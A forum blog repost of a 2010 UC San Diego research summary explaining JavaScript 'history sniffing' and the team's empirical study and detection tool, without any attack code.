Close
Login to Your Account
Faadooengineers
View RSS Feed

mihir23192

Your Web Surfing History Is Accessible (Without Your Permission) Via JavaScript By ..:: NEXUSS ::..

Rate this Entry
The Web surfing history saved in your Web browser can be accessed without your permission. JavaScript code deployed by real websites and online advertising providers use browser vulnerabilities to determine which sites you have and have not visited, according to new research from computer scientists at the University of California, San Diego.
Click image for larger version. 

Name:	javascript-history-filtered.jpg 
Views:	340 
Size:	45.8 KB 
ID:	489
"JavaScript is a great thing, it allows things like Gmail and Google Maps and a whole bunch of Web 2.0 applications; but it also opens up a lot of security vulnerabilities. We want to let the broad public know that history sniffing is possible, it actually happens out there, and that there are a lot of people vulnerable to this attack," said UC San Diego computer science professor Sorin Lerner.
The researchers documented JavaScript code secretly collecting browsing histories of Web users through "history sniffing" and sending that information across the network. While history sniffing and its potential implications for privacy violation have been discussed and demonstrated, the new work provides the first empirical analysis of history sniffing on the real Web.
"Nobody knew if anyone on the Internet was using history sniffing to get at users' private browsing history. What we were able to show is that the answer is yes," said UC San Diego computer science professor Hovav Shacham.
The computer scientists from the UC San Diego Jacobs School of Engineering presented this work in October at the 2010 ACM Conference on Computer and Communications Security (CCS 2010) in a paper entitled, "An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications."

History Sniffing

History sniffing takes place without your knowledge or permission and relies on the fact that browsers display links to sites you've visited differently than ones you haven't: by default, visited links are purple, unvisited links blue. History sniffing JavaScript code running on a Web page checks to see if your browser displays links to specific URLs as blue or purple.
History sniffing can be used by website owners to learn which competitor sites visitors have or have not been to. History sniffing can also be deployed by advertising companies looking to build user profiles, or by online criminals collecting information for future phishing attacks. Learning what banking site you visit, for example, suggests which fake banking page to serve up during a phishing attack aimed at collecting your bank account login information.
"JavaScript is a great thing, it allows things like Gmail and Google Maps and a whole bunch of Web 2.0 applications; but it also opens up a lot of security vulnerabilities. We want to let the broad public know that history sniffing is possible, it actually happens out there, and that there are a lot of people vulnerable to this attack," said UC San Diego computer science professor Sorin Lerner.
The latest versions of Firefox, Chrome, and Safari now block the history sniffing attacks the computer scientists monitored. Internet Explorer, however, does not currently defend against history sniffing. In addition, anyone using anything but the latest versions of the patched browsers is also vulnerable.

Sniffing out History Sniffing

"We built a dynamic data flow engine for JavaScript to track history sniffing in the wild. I don't know of any other practical tool that can be used to do this kind of extensive study," said Dongseok Jang, the UC San Diego computer science Ph.D. student who developed the JavaScript monitoring technology. The researchers plan to broaden their work and study what information is being leaked by applications on social media and other Web 2.0 sites.
The computer scientists looked for history sniffing on the front pages of the top 50,000 websites, according to Alexa global website rankings. They found that 485 of the top 50,000 sites inspect style properties that can be used to infer the browser's history. Out of 485 sites, 63 transferred the browser's history to the network. "We confirmed that 46 of them are actually doing history sniffing, one of these sites being in the Alexa global top 100," the UC San Diego computer scientists write in the CCS 2010 paper.
Table 1 in the paper outlines the websites the computer scientists found that performed history sniffing during the data collection period. In some cases, the websites created their own history sniffing systems. In other cases, advertisements served by outside companies contained JavaScript code performing the history sniffing.

History Sniffing in Perspective

The computer scientists say that history sniffing does not pose as great a risk to your privacy or identity as malicious software programs (malware) that can steal your banking information or your entire Facebook profile. But, according to Shacham, "history sniffing is unusual in effectively allowing any site you visit to learn about your browsing habits on any other site, regardless if the two sites have any business relationship."

To see history sniffing in action, visit: www.whattheinternetknowsaboutyou.com
"I think people who have updated or switched browsers should now worry about things other than history sniffing, like keeping their Flash plug-in up to date so they don't get exploited. But that doesn't mean that the companies that have engaged in history sniffing for the currently 60 percent of the user population that is vulnerable to it should get a free pass," said Shacham.

Tracking History Sniffing

The UC San Diego history-sniffing detection tool analyzes the JavaScript running on the page to identify and tag all instances where the browser history is being checked. The way the system tags each of these potential history tracking events can be compared to the ink or paint packets that banks add to bags of money being stolen.
"As soon as a JavaScript tries to look at the color of a link, we immediately put 'paint' on that. Some sites collected that information but never sent it over the network, so there was all this 'paint' inside the browser. But in other cases, we observed 'paint' being sent over the network, indicating that history sniffing is going on," explained Lerner. The computer scientists only considered it history sniffing when the browser history information was sent over the network to a server.
"We detected when browser history is looked at, collected on the browser and sent on the network from the browser to their servers. What servers then do with that information is speculation," said Lerner.
The "paint" tracking approach to monitoring JavaScript could be useful for more than just history sniffing, Lerner explained. "It could be useful for understanding what information is being leaked by applications on Web 2.0 sites. Many of these apps use a lot of JavaScript."

Updated 4th January 2011 at 03:13 AM by mihir23192

Categories
Technology

Comments

  1. [FE].Zatak's Avatar
    interesting.. found another reason for quitting Internet explorer..thnx

Trackbacks


Send Birthday Wish
Send Birthday Wish
  • rkumars

    rkumars

  • pappu7446

    pappu7446

  • g.v.k.pradeep

    g.v.k.pradeep

  • jaysing44

    jaysing44

  • banupriyanaidu
    Branch : Information Technology Engineering

    banupriyanaidu

  • haresh.miriyala
    Branch : THIS DOES NOT APPLY ON ME!

    haresh.miriyala

  • chitranjan

    chitranjan

  • POOJA.S

    POOJA.S

  • phanindra.ans

    phanindra.ans

  • Sudarsanraja

    Sudarsanraja

  • mohan34

    mohan34

  • keilen
    Branch : Computer Science Engineering

    keilen

  • somil1994
    Branch : Electronics Engineering

    somil1994

  • Shanta

    Shanta

  • Nitesh singh
    Branch : Electronics Engineering

    Nitesh singh

  • khushiram

    khushiram

  • runkumar007
    Branch : THIS DOES NOT APPLY ON ME!

    runkumar007

  • yajan

    yajan

  • SANDEEP KAKHWARI
    Branch : THIS DOES NOT APPLY ON ME!

    SANDEEP KAKHWARI

  • mahaveer

    mahaveer

  • tgtro11

    tgtro11

  • sriram205

    sriram205

  • prahatuty
    Branch : Electrical Engineering

    prahatuty

  • rahegaonkar
    Branch : Electronics Engineering

    rahegaonkar

  • siddharthshobhit
    Branch : Computer Science Engineering

    siddharthshobhit

  • pinkal0949
    Branch : Electrical Engineering

    pinkal0949

  • makarand ram fadnavis

    makarand ram fadnavis

  • ndinesha19

    ndinesha19

  • dabbanng pandey

    dabbanng pandey

  • sjsingh

    sjsingh

  • Rajatbajaj

    Rajatbajaj

  • konaajay

    konaajay

  • meeru

    meeru

  • abarnashree
    Branch : Computer Science Engineering

    abarnashree

  • raviwell

    raviwell

  • shubhanka

    shubhanka

  • Vigya Prakash

    Vigya Prakash

  • Ravi Verma

    Ravi Verma

  • dushyantkumarsingh83
    Branch : Electronics Engineering

    dushyantkumarsingh83

  • Sahil21
    Branch : THIS DOES NOT APPLY ON ME!

    Sahil21

  • nidhi22

    nidhi22

  • dpkverma

    dpkverma

  • anuj garg

    anuj garg

  • wagonr
    Branch : Mechanical Engineering

    wagonr

  • narendran nanjundan

    narendran nanjundan

  • poornima916
    Branch : Electrical Engineering

    poornima916

  • bebopmad
    Branch : Computer Science Engineering

    bebopmad

  • nvidhani
    Branch : Computer Science Engineering

    nvidhani

  • shruti ghoshal

    shruti ghoshal

  • abysamcherian
    Branch : Mechanical Engineering

    abysamcherian

  • jay_panchal
    Branch : Civil Engineering

    jay_panchal

  • sandeepunnao
    Branch : Computer Science Engineering

    sandeepunnao

  • mahesh dalvi
    Branch : Computer Science Engineering

    mahesh dalvi

  • rixo50650

    rixo50650

  • nethinim

    nethinim

  • Pakshekhar
    Branch : Instrumentation Engineering

    Pakshekhar

  • vineetvats
    Branch : Some other branch

    vineetvats

  • abhi91_deo

    abhi91_deo

  • Mantajul sheikh
    Branch : Civil Engineering

    Mantajul sheikh

  • sardulbmp

    sardulbmp

  • ashu24

    ashu24

  • fghdh
    Branch : Computer Science Engineering

    fghdh

  • boomba
    Branch : Computer Science Engineering

    boomba

  • rahul8350
    Branch : Computer Science Engineering

    rahul8350

  • saurabhg

    saurabhg

  • siddu_449

    siddu_449

  • amit kum

    amit kum

  • gokulkannan

    gokulkannan

  • abhilashkanduri

    abhilashkanduri

  • papamike
    Branch : Mechanical Engineering

    papamike

  • TheCriminal

    TheCriminal

  • sonitsharma7

    sonitsharma7

  • prateek4here

    prateek4here

  • aashutosh99

    aashutosh99

  • PAMLA
    Branch : THIS DOES NOT APPLY ON ME!

    PAMLA

  • rishi_02in

    rishi_02in

  • radhikamaiya

    radhikamaiya

  • Rakshit Tyagi

    Rakshit Tyagi

  • avenger10
    Branch : Computer Science Engineering

    avenger10

  • maddog5413

    maddog5413

  • hiranmoy
    Branch : Aeronautical Engineering

    hiranmoy

  • neerajana

    neerajana

  • faraaz ahmed

    faraaz ahmed

  • vijay00
    Branch : Information Technology Engineering

    vijay00

  • dhanu naik

    dhanu naik

  • dollz

    dollz

  • darkprince
    Branch : Computer Science Engineering

    darkprince

  • rookie
    Branch : Computer Science Engineering

    rookie

  • anas369

    anas369

  • vikram49

    vikram49

  • balaji87
    Branch : Computer Science Engineering

    balaji87

  • aclestaf

    aclestaf

  • Parwez

    Parwez

  • ptusha
    Branch : THIS DOES NOT APPLY ON ME!

    ptusha

  • ABHINAV ROYCHAND
    Branch : Mechanical Engineering

    ABHINAV ROYCHAND

  • razzaq_6018

    razzaq_6018

  • dipika gupta

    dipika gupta

  • sumitmitwa

    sumitmitwa

  • pacha
    Branch : Mechanical Engineering

    pacha

  • arun_subramanian2012
    Branch : Electrical Engineering

    arun_subramanian2012

×

Send Birthday wish

Send Wish